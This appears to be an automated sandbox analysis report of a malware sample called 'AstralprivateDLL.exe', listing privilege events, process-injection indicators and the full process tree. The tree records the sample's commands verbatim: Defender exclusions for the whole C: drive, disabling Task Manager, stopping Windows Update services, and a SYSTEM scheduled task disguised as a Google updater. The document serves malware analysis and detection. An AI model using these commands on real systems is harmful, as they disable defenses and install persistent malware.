Token: SeDebugPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	756	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	3372	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	792	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	5584	Idle.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	3192	dialer.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeShutdownPrivilege	384	powercfg.exe
Token: SeCreatePagefilePrivilege	384	powercfg.exe
Token: SeShutdownPrivilege	1448	powercfg.exe
Token: SeCreatePagefilePrivilege	1448	powercfg.exe
Token: SeShutdownPrivilege	2428	powercfg.exe
Token: SeCreatePagefilePrivilege	2428	powercfg.exe
Token: SeShutdownPrivilege	2640	powercfg.exe
Token: SeCreatePagefilePrivilege	2640	powercfg.exe
Token: SeIncreaseQuotaPrivilege	2368	powershell.exe
Token: SeSecurityPrivilege	2368	powershell.exe
Token: SeTakeOwnershipPrivilege	2368	powershell.exe
Token: SeLoadDriverPrivilege	2368	powershell.exe
Token: SeSystemProfilePrivilege	2368	powershell.exe
Token: SeSystemtimePrivilege	2368	powershell.exe
Token: SeProfSingleProcessPrivilege	2368	powershell.exe
Token: SeIncBasePriorityPrivilege	2368	powershell.exe
Token: SeCreatePagefilePrivilege	2368	powershell.exe
Token: SeBackupPrivilege	2368	powershell.exe
Token: SeRestorePrivilege	2368	powershell.exe
Token: SeShutdownPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeSystemEnvironmentPrivilege	2368	powershell.exe
Token: SeRemoteShutdownPrivilege	2368	powershell.exe
Token: SeUndockPrivilege	2368	powershell.exe
Token: SeManageVolumePrivilege	2368	powershell.exe
Token: 33	2368	powershell.exe
Token: 34	2368	powershell.exe
Token: 35	2368	powershell.exe
Token: 36	2368	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2224	svchost.exe
Token: SeIncreaseQuotaPrivilege	2224	svchost.exe
Token: SeSecurityPrivilege	2224	svchost.exe
Token: SeTakeOwnershipPrivilege	2224	svchost.exe
Token: SeLoadDriverPrivilege	2224	svchost.exe
Token: SeSystemtimePrivilege	2224	svchost.exe
Token: SeBackupPrivilege	2224	svchost.exe
Token: SeRestorePrivilege	2224	svchost.exe
Token: SeShutdownPrivilege	2224	svchost.exe
Token: SeSystemEnvironmentPrivilege	2224	svchost.exe
Token: SeUndockPrivilege	2224	svchost.exe
Token: SeManageVolumePrivilege	2224	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2224	svchost.exe

Suspicious use of UnmapMainImage 3 IoCs

Processes:

svchost.exeExplorer.EXE

pid process

2404 svchost.exe
2404 svchost.exe
3432 Explorer.EXE

pid	process
2404	svchost.exe
2404	svchost.exe
3432	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AstralprivateDLL.exeAstral private DLL.exeWScript.execmd.exeServerComponenthostMonitorDll.execsc.execmd.exe

description	pid	process	target process
PID 5092 wrote to memory of 3328	5092	AstralprivateDLL.exe	Astral private DLL.exe
PID 5092 wrote to memory of 3328	5092	AstralprivateDLL.exe	Astral private DLL.exe
PID 5092 wrote to memory of 3328	5092	AstralprivateDLL.exe	Astral private DLL.exe
PID 5092 wrote to memory of 1792	5092	AstralprivateDLL.exe	twain_32.exe
PID 5092 wrote to memory of 1792	5092	AstralprivateDLL.exe	twain_32.exe
PID 3328 wrote to memory of 1900	3328	Astral private DLL.exe	WScript.exe
PID 3328 wrote to memory of 1900	3328	Astral private DLL.exe	WScript.exe
PID 3328 wrote to memory of 1900	3328	Astral private DLL.exe	WScript.exe
PID 1900 wrote to memory of 2960	1900	WScript.exe	cmd.exe
PID 1900 wrote to memory of 2960	1900	WScript.exe	cmd.exe
PID 1900 wrote to memory of 2960	1900	WScript.exe	cmd.exe
PID 2960 wrote to memory of 428	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 428	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 428	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 2848	2960	cmd.exe	ServerComponenthostMonitorDll.exe
PID 2960 wrote to memory of 2848	2960	cmd.exe	ServerComponenthostMonitorDll.exe
PID 2848 wrote to memory of 3156	2848	ServerComponenthostMonitorDll.exe	csc.exe
PID 2848 wrote to memory of 3156	2848	ServerComponenthostMonitorDll.exe	csc.exe
PID 3156 wrote to memory of 3676	3156	csc.exe	cvtres.exe
PID 3156 wrote to memory of 3676	3156	csc.exe	cvtres.exe
PID 2848 wrote to memory of 1632	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 1632	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 3112	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 3112	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 1328	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 1328	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 4768	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 4768	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 4120	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 4120	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 1028	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 1028	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 2488	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 2488	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 3380	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 3380	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 5044	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 5044	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 3372	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 3372	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 448	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 448	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 792	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 792	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 3060	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 3060	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 4972	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 4972	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 756	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 756	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 640	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 640	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 1540	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 1540	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 624	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 624	2848	ServerComponenthostMonitorDll.exe	powershell.exe
PID 2848 wrote to memory of 3520	2848	ServerComponenthostMonitorDll.exe	cmd.exe
PID 2848 wrote to memory of 3520	2848	ServerComponenthostMonitorDll.exe	cmd.exe
PID 3520 wrote to memory of 5780	3520	cmd.exe	chcp.com
PID 3520 wrote to memory of 5780	3520	cmd.exe	chcp.com
PID 3520 wrote to memory of 5160	3520	cmd.exe	w32tm.exe
PID 3520 wrote to memory of 5160	3520	cmd.exe	w32tm.exe
PID 3520 wrote to memory of 5584	3520	cmd.exe	Idle.exe
PID 3520 wrote to memory of 5584	3520	cmd.exe	Idle.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:380

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:60

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1204
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3164
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:2072

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1532
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2024

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Suspicious use of UnmapMainImage
PID:2404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2444

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2580

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3356

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3432
- C:\Users\Admin\AppData\Local\Temp\AstralprivateDLL.exe
  "C:\Users\Admin\AppData\Local\Temp\AstralprivateDLL.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5092
- - C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe
    "C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3328
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1900
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2960
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:428
      - C:\containerperf\ServerComponenthostMonitorDll.exe
        
        "C:\containerperf/ServerComponenthostMonitorDll.exe"
        6⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2848
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e1d5cmlp\e1d5cmlp.cmdline"
        7⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:3156
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC9F7.tmp" "c:\Windows\System32\CSC2F91EB39BFA94C38A1D1E6B7EB73E714.TMP"
        8⤵
        
        PID:3676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerperf/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\My Documents\Idle.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\taskhostw.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\dotnet\swidtag\lsass.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PolicyDefinitions\it-IT\cmd.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\containerperf\ServerComponenthostMonitorDll.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:624
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WyVA1GuKZ9.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3520
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5780
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:5160
        
        C:\Users\Default\My Documents\Idle.exe
        
        "C:\Users\Default\My Documents\Idle.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5584
- - C:\Users\Admin\AppData\Local\Temp\twain_32.exe
    "C:\Users\Admin\AppData\Local\Temp\twain_32.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    PID:1792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1376
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1112
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3568
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3372
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3980
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3708
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:536
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1480
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:384
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2640
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2368
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5448
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4288
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5416
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2952
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1548
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3132
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4928
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2208
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2504
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1808
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5516
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3328
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3320
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:1740
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2772
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:5964
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:5528
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
